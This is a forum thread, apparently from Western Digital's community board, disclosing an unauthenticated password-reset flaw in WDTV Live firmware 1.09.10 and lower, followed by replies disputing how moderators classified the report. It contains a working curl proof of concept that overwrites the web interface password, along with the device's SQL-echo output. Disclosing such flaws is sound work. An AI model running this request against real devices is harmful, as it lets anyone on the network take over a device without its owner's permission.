Security: Password reset possible from internal LAN IP w/o authentication

It is possible to set a new password for the web interface without further authentication. (One does not have to know the old web interface password to set a new password.)

A HTTP POST request to /DB/modfiy_pwd.php on WDTV Live will overwrite the web interface’s password.

Example request using curl:

#!/bin/sh
#IP of WDTV Live:
WDTVLIVE=1.2.3.4
curl -d "password=bla" http://${WDTVLIVE}/DB/modfiy_pw.php

 Output:

blaUPDATE web_password SET user_password_pw="bla" where user_id="1"1

 Now you can login to the web interface using password ‘bla’.

Firmware: 1.09.10 and lower
What hardware and media were you using? WDTV Live SMP (european)
Does it happen every time? sure.
Does it happen with previous firmware? yes.
Does power cycling the unit solve it? of course not.
Does resetting to factory defaults solve it? of course not.
Have you tried this on other devices? WDTVLive Hub

Eeek!

Nasty.

well, it’s getting even better - stay tuned

I believe this is an “issue” rather than a “discussion topic” so would the moderators be so kind to move it back to http://community.wdc.com/t5/WD-TV-Live-Streaming-Issue/idb-p/streaming_issues !

double—  You’ll need to also complete all the other info needed to have the issue examined.

“This is not an issue and should not be posted here.” (permalink)

Bill_S, could you please elaborate why this security flaw is not an issue and where else one should post issues with Western Digital’s Live SMP devices?

I agree with double08:   This is a real issue;  the programming for passwords on the WDTV is insecure. 

This means that anyone can change the password on the WDTV without needing to know the current password, and then can immediately access the Web UI and make changes without permission.

*bump*